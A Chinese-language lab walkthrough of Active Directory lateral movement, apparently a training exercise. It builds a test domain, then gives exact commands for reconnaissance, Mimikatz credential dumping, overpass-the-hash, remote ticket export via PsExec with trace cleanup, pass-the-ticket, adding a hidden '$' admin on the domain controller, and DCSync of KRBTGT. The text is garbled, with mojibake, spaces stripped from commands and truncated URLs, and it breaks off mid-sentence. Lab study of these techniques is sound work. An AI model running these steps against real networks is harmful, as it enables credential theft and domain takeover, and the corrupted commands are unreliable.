2022域滲透從?入?門防護

域滲透從入門防護手冊前期準備前言本系列在于從簡單的Windows域環(huán)境搭建到利用域的特性，通過哈希傳遞攻擊、憑證竊取技術結合互聯(lián)網(wǎng)公布現(xiàn)成的安全研究工具，進行域橫向移動滲透，最終到達我們目標，拿到ad域控制?權限。實驗環(huán)境設置下面列出本次實驗環(huán)境計算機跟練習中的一些配置設置，均在VMWARE下完成。我們的域名將被命名為公司，因此創(chuàng)建域，然后將這些PC電腦加入域，let’sgo!本次實驗環(huán)境一共有三臺電腦，一臺AD域控制?DC，另外兩臺員工PC。系統(tǒng)ISO下載地址:/WindowsServer2012(DC1)修改計算機名修改IP地址服務?管理?—角色—添加AD一路下一步，到服務?角色選擇ActiveDirectory域服務，添加功能繼續(xù)一路下一步，到指定備用源選擇自己WindowsServer2012R2的安裝光盤位置路徑，這里我的光盤路徑是D:\source\sxs，指定完后確定，點擊安裝安裝AD域控制?回到我們服務?管理?界面，點擊輸入一個符合復雜度的密碼，點擊下一步。域數(shù)據(jù)存放位置一路下一步，安裝。Windows7(Admins-PC/Victims-PC)另外兩臺PC配置類似設置計算機名設置IP地址加入域控兩臺機?加入完域后，必須重啟計算機。關閉防火墻重啟完電腦后，把所有防火墻關閉現(xiàn)在所有的電腦都加入了域，接下來我們添加一些賬號跟組到域環(huán)境當中。域賬號設置在本次實驗練習當中，你將看到helpdesk幫助臺和域管理員之間進行分離，但其實并沒有什么用，不足以防止憑證竊取。讓我們創(chuàng)建一個helpdesk組作為安全組進行分離。組名成員描述HelpdeskPonyM用于管理域客戶端開始菜單->運行>dsa.msc->容?Users->右擊新建->點擊組->輸入組名HelpDesk->確定或直接在域控服務?下以administrator權限輸入命令netgroupHelpDesk/add/domain進行創(chuàng)建安全組HelpDesk讓我們在域中創(chuàng)建三個用戶姓名登錄賬號描述登錄機?JackMaJackM?創(chuàng)阿里Jack馬，是遭受釣魚郵件的受害者VICTIMS-PCPonyMaPonyM普通家庭Pony馬，是IT部門人員，同時也是”Helpdesk”安全組的成員。VICTIMS-PCADMINS-PCRobinLiRobinL再贏一次Robin李，是域管理員。ADMINS-PCAD域控制?依次按照以下步驟重復新建3個用戶Jackma/Ponyma/RobinLi-以及添加RobinLi到域管理員或直接在域控服務?下以administrator權限輸入命令netuserJackMpassword123!@#/add/domainnetuserPonyMpassword456!@#/add/domainnetuserRobinLpassword789!@#/add/domainnetgroup“DomainAdminis”RobinL/add最后創(chuàng)建了三個賬號以及一個安全組對了別忘記把PonyMa加入HelpDesk安全組右擊PonyMa屬性->隸屬于->添加->HelpDesk->確定或直接在域控服務?下以administrator權限輸入命令netgrouphelpdeskPonyM/add/domain我們的域管理員RobinLi日常使用ADMINS-PC。其中Helpdesk（PonyMa是其中一員）可以管理ADMINS-PC的計算機。搜索對應組輸入域賬號密碼，確定接著JackMa以及HelpDesk將被添加到他的個人終端電腦（VICTIMS-PC）管理員權限本次實驗工具將在VICTIMS-PC電腦上安裝以下工具，文件存儲于Mimikatz:/gentilkiwi/mimikatz/releasesPowerSploit:/PowerShellMafia/PowerSploit/releasesPsExec:/en-us/sysinternals/downloads/psexecNetSess.exe:\h/freetools/tools/netsess/index.htm注意本次實驗練習過程，需關閉防病毒軟件，這些工具僅供測試使用。另外相關的軟件源碼屬于開源的，攻擊者可以根據(jù)源碼，針對病毒庫內(nèi)特征碼進行二次開發(fā)以躲避殺毒軟件的查殺。假設在我們的示例中，JackM是他自己的工作站的管理員。許多客戶端的用戶仍然以管理員權限運行。在這種情況下，由于對手已經(jīng)在執(zhí)行滲透后操作的環(huán)境中擁有管理員訪問權限，因此無需進行本地升級攻擊。但是，即使IT部門減少了使用非管理員帳戶的特權，也會執(zhí)行其他形式的攻擊（例如，已知的應用程序1Day/NDay漏洞，0Day等）來實現(xiàn)本地特權提升。在這種情況下，我們的假設很簡單：對手在Victim-PC上實現(xiàn)了本地特權升級。正如我們將在下面討論的那樣，在我們的虛擬實驗環(huán)境中，這是通過給JackM的IM通訊軟件發(fā)送一封魚叉式通告文件實現(xiàn)的。環(huán)境拓撲接下來我們的實驗環(huán)境跟以上拓撲圖一樣，我們域之間有通過組來進行角色分離，接下來我們將模擬攻擊者進行域內(nèi)橫向滲透，利用上面現(xiàn)有的工具接管整個域控。模擬HelpDesk幫助臺模擬常見的HelpDesk幫助臺場景，其中HelpDesk幫助臺成員PonyMa登錄到VICTIMS-PC，然后點擊開始菜單，切換用戶，切換至JackMa身份登錄，模擬特權用戶登錄此工作站上的憑證管理。我們可以選擇其他方式進行模擬本次實驗，比如創(chuàng)建批處理腳本進行服務賬戶管理、計劃任務、RDP會話或者”runas”命令行。本地特權管理員在一天結束之內(nèi)，基本都會使用以上相關操作，這里我們選擇最快的方式進行模擬這個過程。不要注銷或者重啟VICTIMS-PC，因為這會導致內(nèi)存清除PonyMa的憑證。計算機計算機上保存的憑證ADMINS-PCRobinLVICTIMS-PCJackMPonyM(由設置helpdesk場景引起)我們的實驗環(huán)境已經(jīng)準備好了，接下來我們來正式模擬攻擊者如何從一個最低權限的賬號橫向到域控制?。通過魚叉攻擊最近新冠病毒疫情原因，JackMa作為一名家長，時刻關注小學什么時候才正式開學，好把家里的”混世小魔王”趕快送去學校。這一天他在辦公室操作電腦，臨近下班，突然孩子班級家長QQ群里，班主任傳出來一份文件，JackMa當時想都沒想，直接在公司的電腦打開連接，下載了文件，打開運行。正式開始攻擊我們的游戲開始了，按照真實環(huán)境進行模擬后滲透中攻擊者的活動。偵察一旦攻擊者進入到域環(huán)境中，偵察就開始了，在這個階段中對手花時間進行研究域內(nèi)環(huán)境，進行信息收集，枚舉安全組和其他活動目錄對象，以根據(jù)獲取的信息繪制一個攻擊的路線圖。DNS協(xié)議偵察大部分攻擊者進入域內(nèi)第一件事要做的就是嘗試接收DNS的所有內(nèi)容。行動：DNS偵察在以JackM身份登錄的VICTIMS-PC上，攻擊者剛剛入侵的PC，以用戶運行以下命令：nslookupls–d幸運的是，我們的DNS配置為默認阻止此DNS針對域進行轉儲。但如果不當?shù)呐渲脤е翫NS域傳送泄露漏洞，任何匿名用戶都可以獲取DNS服務?對應域的所有記錄，直接把企業(yè)域內(nèi)基礎服務跟網(wǎng)絡架構暴露，從而造成嚴重信息泄露，導致攻擊者可利用相關信息進行下一步的滲透。目錄服務枚舉安全帳戶管理?遠程協(xié)議（SAMR）為域中的用戶和組提供管理功能。了解用戶、組和權限之間的關系對于攻擊者來說非常重要。任何經(jīng)過身份驗證的用戶都可以執(zhí)行這些命令。枚舉所有的用戶和組列舉用戶和組對攻擊者非常有用。知道用戶名和組名會很方便。作為一名攻擊者，你要盡可能多地收集信息，畢竟這是偵察階段。行動：枚舉用戶和組使用JackM帳戶，登錄到VICTIMS-PC上，并嘗試使用以下命令拉取所有域用戶和組：netuser/domainnetgroup/domain這些操作都屬于普通用戶使用合法憑證可以進行的操作，現(xiàn)在攻擊者已經(jīng)了解域中所有用戶和組信息。枚舉高特權用戶攻擊者現(xiàn)在同時擁有用戶列表和組列表。但知道誰在哪個組中也很重要，特別是對于企業(yè)管理員“EnterpriseAdmins”和域管理員“DomainAdmins”這樣的高特權組。我們就這樣…行動：枚舉域管理員在VICTIMS-PC上以JackM的身份運行以下命令:netgroup“domainadmins”/domain攻擊者現(xiàn)在擁有所有用戶和組，并知道哪些用戶屬于特權域管理員“DomainAdmins”組。攻擊者不會就此停止進攻，他們知道企業(yè)管理員和域管理員之間沒有安全邊界，因此他們也會獲取企業(yè)管理員列表。行動：枚舉企業(yè)管理員要獲取此企業(yè)管理員組的成員，請在VICTIMS-PC上運行以下命令：netgroup“enterpriseadmins”/domain在企業(yè)管理員組中有一個帳戶不太有趣，因為它只是默認設置，但攻擊者在JackM帳戶中獲取更多的信息，并已識別他們最想攻擊的用戶是誰。SMB會話枚舉攻擊者知道他們愿意為獲得最大的憑據(jù)而想妥協(xié)的人，但是他們并不完全知道如何對那些憑據(jù)進行妥協(xié)，對叭？SMB枚舉可以為暴露這些非常有趣的帳戶的位置，給攻擊者提供精確的位置。所有經(jīng)過身份驗證的用戶必須連接到域控制?以處理組策略（針對SYSVOL），從而使SMB枚舉成為攻擊者的重要工具。這使域控制?成為執(zhí)行SMB枚舉的主要目標行動：對DC執(zhí)行SMB會話枚舉若要枚舉連接到特定計算機的用戶，在這種情況下，請轉到VICTIMS-PC上的Netess本地保存的位置并運行以下命令：NetSess.exe根據(jù)前面的信息我們已經(jīng)知道RobinL是域管理員，現(xiàn)在通過SMB會話枚舉，攻擊者得知RobinL的IP地址(1)橫向移動僅需采取幾個步驟，您就已經(jīng)可以獲得很多信息。至此，目標變成了您發(fā)現(xiàn)的IP地址：1（公開了RobinL的計算機憑據(jù)）。枚舉在內(nèi)存中的憑據(jù)Victim-PC不僅具有JackM的憑據(jù)，而且還有許多其他帳戶可能對攻擊者有用。我們來列舉一下Victim-PC上的內(nèi)存中憑據(jù)。幸運的是，有一個用于此目的的工具：Mimikatz。行動：從VICTIMS-PC轉儲憑據(jù)從VICTIMS-PC上以管理員權限運行命令提示符，轉到保存Mimikatz的工具文件夾，并執(zhí)行以下命令：mimikatz.exe“privilege::debug”“sekurlsa::logonpasswords”“exit”>>c:\VICTIMS-PC.txt上面的命令將執(zhí)行Mimikatz，然后在內(nèi)存中獲取憑據(jù)。這個工具會把它寫進一個名為“VICTIMS-PC.txt”的文本文件”.打開“VICTIMS-PC.txt”文件“看看你能找到什么。行動：解析Mimikatz的憑證轉儲輸出使用記事本打開文件“VICTIMS-PC.txt“。如果你的文件，看起來不像這個例子，是因為不同的密碼或使用的操作系統(tǒng)可能不同，以及默認密碼策略設置為開/關。攻擊者找到了JackM的憑據(jù)，這將允許他們偽裝成JackM。攻擊者還發(fā)現(xiàn)了計算機帳戶，該帳戶與用戶帳戶一樣，可以添加到其他計算機的本地管理組和其他高權限安全組中。這在這種情況下并不有用，但你應該始終記住，計算機帳戶也可以映射到其他地方的特權。攻擊者還發(fā)現(xiàn)了一個潛在的易攻擊的帳戶PonyM。記住，PonyM是在安裝階段登錄到受害者電腦的。那個憑證當時暴露在內(nèi)存中的LSASS.EXE進程中，Mimikatz給了攻擊者下一步進攻的可能性。當你針對域管理員或企業(yè)管理員中的用戶進行枚舉時，PonyM沒有列出，但請記住，你現(xiàn)在可以訪問他的憑據(jù)。但是要注意的是，在某些情況下，這個Mimikatz轉儲憑證可能會顯示明文密碼，當環(huán)境未更新或未配置為阻止WDigest時。最新的環(huán)境（Win8&Win10&Win&Service2012以上），遵循最佳實踐，將返回一個空密碼字段。最后，在使用PonyM的帳戶之前，讓我們看看它是否有任何價值。讓我們用那個帳戶做些信息收集。有關WDigest的更多信息，請參閱：/kfalde/2014/11/01/kb2871997-and-wdigest-part-1/行動：對PonyM帳戶執(zhí)行信息收集在VICTIMS-PC的命令行中，執(zhí)行以下操作：netuserPonyM/domain攻擊者將得知PonyM是HelpDesk幫助臺的成員。PonyM的帳戶對攻擊者來說很有趣。但是，還需要進一步的分析，以查看該帳戶是否在其他計算機上具有管理員權限。畢竟，使用它橫向移動到另一臺計算機上卻發(fā)現(xiàn)它的權限比攻擊者已經(jīng)擁有的權限低是沒有意義的。行動：枚舉遠程計算機的成員身份這里使用的工具是PowerSploit，滲透測試人員使用的其中一個PowerShell模塊。打開一個PowerShell會話，并遍歷PowerSploit保存在VICTIMS-PC本地上的位置。在PowerShell控制臺中，執(zhí)行：Import-Module.\PowerSploit.psm1Get-NetLocalGroup1在第一行中，將PowerSploit模塊導入內(nèi)存，在第二行中執(zhí)行該模塊提供的函數(shù)之一，在本例中為GetNetLocalGroup。同樣，1是5.行動：對DC執(zhí)行SMB會話枚舉階段發(fā)現(xiàn)的IP地址。攻擊者剛剛發(fā)現(xiàn)以下內(nèi)容：1連接到ADMINS-PC（我們將IP地址解析為計算機名也通過powerspoit）“/DomainAdmins“和”/HelpDesk“是管理員組PonyM是Helpdesk組的成員，因此PonyM可以授予攻擊者在ADMINS-PC上的管理員權限（攻擊者從前期的信息收集中知道RobinL在其中）。攻擊者使用這種類似關系之間關聯(lián)的思考方式是發(fā)現(xiàn)網(wǎng)絡中的關系，下一步攻擊者應該如何使用PonyM進行橫向移動？哈希傳遞攻擊(Overpass-the-Hash)如果攻擊者所處的環(huán)境沒有禁用WDigest，則已經(jīng)游戲結束了，因為他們使用的是明文密碼。但是，本著學習的精神，讓我們更加努力，假設您不知道/無法訪問明文密碼。那么，只要訪問PonyM的NTLM散列，你能做什么？使用名為OverpasstheHash的技術，您可以獲取NTLM散列，并使用它通過Kerberos\ActiveDirectory獲取票據(jù)，授予票據(jù)TGT(TicketGrantingTicket）。有了TGT，你可以偽裝成PonyM并訪問PonyM可以訪問的任何域資源。行動：對PonyM進行哈希傳遞攻擊在這里你將再次使用Mimikatz。從VICTIMS-PC那里復制PonyM的NTLM散列VICTIMS-PC.txt文件，早期獲取（6.行動：從VICTIMS-PC轉儲憑據(jù)）。在VICTIMS-PC上，轉到文件系統(tǒng)中存儲Mimikatz的位置，并執(zhí)行以下命令：Mimikatz.exe“privilege::debug”“sekurlsa::pth/user:PonyM/ntlm:[ntlmhash]/domain:”“exit”用來自VICTIMS-PC上的VICTIMS-PC.txt文件中PonyM的NTLM值進行替換[ntlmhash]執(zhí)行完上面命令后，將打開新的命令行提示會話，這個新的命令提示符將PonyM的憑據(jù)注入。讓我們驗證一下，看看是否可以讀取Admins-PC的C$內(nèi)容，這是用戶JackM根本沒有權限進行操作的事情。行動：使用PonyM的憑證讀取Admins-PC的C$在新命令提示符下，運行以下命令：dir\\admin-pc\c$是的，攻擊者現(xiàn)在可以訪問Admins-PC的C盤，讓我們驗證一下，打開的新命令提示符注入了PonyM的Ticket票據(jù)，而且您并沒有誤認為JackM具有讀取權限。行動：在哈希傳遞攻擊過的命令提示符下檢查Ticket票據(jù)在從哈希傳遞攻擊（Overpass-the-hash）攻擊打開的新命令提示符中，執(zhí)行以下命令：klist這個命令確認你當前使用合法的憑證，用以訪問管理ADMINS-PC。域權限提升攻擊者現(xiàn)在可以訪問Admins-PC，這是一臺從早期的偵察中識別出的能夠危害高權限帳戶RobinL的良好攻擊載體的計算機。攻擊者現(xiàn)在想進入Admins-PC，提升其在域中的權限。收獲憑證執(zhí)行哈希傳遞攻擊將允許我們橫向移動到Admins-PC。接著我們需要將攻擊者工具移動到Admins-PC上，特別是Mimikatz和PsExec。行動：針對Admin-PC執(zhí)行Mimikatz在PonyM上下文中運行的新命令提示符下，轉到Victim-PC中Mimikatz所在的文件系統(tǒng)部分。運行以下命令：xcopymimikatz\\admin-pc\c$\temp接下來，遠程執(zhí)行MimiKatz以從Admin-PC導出所有Kerberos票據(jù)：psexec.exe\\admins-pc-accepteulacmd/c(cdc:\temp^&mimikatz.exe“privilege::debug”“sekurlsa::tickets/export”“exit”)由于我們僅對RobinL的票據(jù)感興趣，因此我們僅將RobinL的票據(jù)復制回Victim-PC：copy\\admins-pc\c$\temp\*robinl*c:\temp\tickets既然我們已經(jīng)復制了Admins-PC的憑證，就可以刪除復制過來的文件和導出的票據(jù)，清除痕跡。rmdir\\admins-pc\c$\temp/s/q剛才發(fā)生了什么？攻擊者已成功將Mimikatz工具復制到Admins-PC。他們成功地遠程執(zhí)行了Mimikatz，從Admins-PC導出了所有Kerberos票據(jù)。最后，攻擊者將結果復制回Victims-PC，現(xiàn)在有了RobinL的憑據(jù)，而不必利用他的電腦(Admins-PC)！Pass-the-Ticket我們可以用這些票據(jù)做什么？我們可以直接將它們傳遞到內(nèi)存中，并像使用RobinL一樣使用它們來訪問資源。攻擊者已準備好將其導入Victims-PC的內(nèi)存中，以獲取要訪問的憑據(jù)?感資源。驗證您沒有對DC1域控制?的域管理員級別訪問權限從命令提示符處執(zhí)行以下操作:dir\\dc1\c$klist如我們所見，我們正在使用PonyM的票據(jù)，并且PonyM無權訪問的DC1下的C盤目錄。行動：Pass-the-Ticket在命令提示符下切換到Minikatz目錄下進行權限提升，執(zhí)行以下命令：mimikatz.exe“privilege::debug”“kerberos::pttc:\temp\tickets”“exit”\h確保已成功導入RobinL@票據(jù)，如上所述?，F(xiàn)在，讓我們驗證命令提示會話中是否有正確的票據(jù)。行動：驗證票據(jù)是否已導入在剛才已經(jīng)提升權限的命令提示符下進行以下操作：klist攻擊者現(xiàn)在已成功將捕獲的票據(jù)導入會話，現(xiàn)在將利用他們的新權限和訪問權限訪問域控制?DC1下的C盤目錄。行動：使用RobinL的憑據(jù)訪問dc1\c$的內(nèi)容在剛剛導入票據(jù)的同一命令提示符中執(zhí)行以下操作。dir\\dc1\c$無論出于何種目的，攻擊者現(xiàn)在都處于互聯(lián)網(wǎng)中。只有管理員RobinL才能訪問域控制?的根目錄。攻擊者正在使用合法憑據(jù)，可以訪問合法資源并執(zhí)行合法可執(zhí)行文件。大多數(shù)IT安全設備、軟件等都會對在其環(huán)境中進行的這種域內(nèi)后滲透活動視而不見。遠程命令執(zhí)行針對DC的遠程代碼執(zhí)行是每個攻擊者都希望做的事情，對我們的身份層本身進行修改會使檢測他們的存在變得非常困難。讓我們執(zhí)行遠程命令將用戶添加到域中，并使用RobinL的合法憑據(jù)將他們添加到“Administrators”安全組中。使用內(nèi)置工具，無需惡意軟件或黑客工具。行動：對DC1遠程執(zhí)行命令添加管理員在加載RobinL的Kerberos票據(jù)的命令提示符下，執(zhí)行以下操作：wmic/node:dc1processcallcreate“netuseradmin1$1234abcd!!/add”wmic/node:dc1processcallcreate“netlocalgroupadministratorsadmin1$/add”或psexec\\dc1-accepteulanetuseradmin$1234abcd!!/addpsexec\\dc1-accepteulanetlocalgroupAdministratorsadmin$/add域控制權

向域中添加管理員攻擊者已經(jīng)獲得了域控制權，他們可以作為管理員運行任何代碼，并訪問域中的任何資源。然而，為了確保域控制的持久性，后門和其他機制作為保障，以防原始攻擊方法被發(fā)現(xiàn)，或證書隨機重置。首先你要破壞KRBTGT用戶的憑據(jù)帳戶。此帳戶充當密鑰分發(fā)中心（KDC）服務的服務帳戶。一旦您破壞了KRBTGT帳戶，您將能夠生成Kerberos票據(jù)有效期10年。直流同步：破壞KRBTGT到目前為止，攻擊者在DC上所做的一切都要求他們在DC上運行任意代碼。如果攻擊者決定運行更隱蔽的攻擊，即不在DC上運行任意代碼的攻擊（沒有PsExec或將用戶添加到提升的組中），該怎么辦。Mimikatz，有一個叫做“DCSync”的功能。這允許攻擊者使用域管理憑據(jù)將任何憑據(jù)復制回它們，就像它們是DC域控制?一樣。行動：破壞KRBTGT證書如果關閉了命令提示符，則打開具有RobinL憑據(jù)的命令提示符，回到第14步行動。轉到命令提示符，確保RobinL的票據(jù)仍然被注入到會話中。klist從krbtgt驗證RobinL/現(xiàn)在，我們知道自己在正確的控制臺上工作，我們可以模擬攻擊者并嘗試獲取域的最終憑證：KRBTGT。為什么是這個賬戶？用這個帳戶，你可以簽你自己的票據(jù)。行動：執(zhí)行DCsync同步從Victim-PC上現(xiàn)已驗證的RobinL命令提示符，遍歷到文件系統(tǒng)上Mimikatz所在的位置，然后執(zhí)行以下命令：mimikatz.exe“l(fā)sadump::dcsync/domain:/user:krbtgt”“exit”>>c:\krbtgt-export.txt針對krbtgt帳戶的DCsync同步一旦攻擊者打開“krbtgt-export.txt“他們將得到所需的KRBTGT票據(jù)詳細信息。打開“krbtgt-export.txt“我們剛剛將hasndump哈